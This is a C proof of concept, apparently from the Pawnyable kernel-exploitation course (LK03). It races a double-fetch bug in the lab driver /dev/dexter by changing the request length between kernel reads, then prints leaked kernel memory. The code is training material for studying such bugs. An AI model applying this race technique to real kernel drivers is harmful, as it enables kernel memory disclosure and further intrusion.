Pawnyable LK03

double_fetch_poc.c

#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define CMD_GET 0xdec50001
#define CMD_SET 0xdec50002

void fatal(char *msg) {
    perror(msg);
    exit(-1);
}

typedef struct {
    char *ptr;
    size_t len;
} request_t;

int fd;
request_t req;
int race_win = 0;

int set(char *buf, size_t len) {
    req.ptr = buf;
    req.len = len;
    return ioctl(fd, CMD_SET, &req);
}

int get(char *buf, size_t len) {
    req.ptr = buf;
    req.len = len;
    return ioctl(fd, CMD_GET, &req);
}

void *race(void *arg) {
    puts("[*] trying to set req.len to 0x100");
    while (!race_win) {
        req.len = 0x100;
        usleep(1);
    }
    return NULL;
}

int main() {
    fd = open("/dev/dexter", O_RDWR);
    if (fd == -1)
        fatal("/dev/dexter");

    char buf[0x100] = {0};
    char zero[0x100] = {0};
    pthread_t th;
    pthread_create(&th, NULL, race, NULL);
    puts("[*] trying to read 0x20 from /dev/dexter");
    while (!race_win) {
        get(buf, 0x20);
        if (memcmp(buf, zero, 0x100) != 0) {
            puts("[+] reached race condition");
            race_win = 1;
            break;
        }
    }
    pthread_join(th, NULL);
    puts("[+] more than 0x20 data is leaked:");
    for (int i = 0; i < 0x100; i += 8)
        printf("%02x: 0x%016lx\n", i, *(unsigned long *)&buf[i]);

    close(fd);
    return 0;
}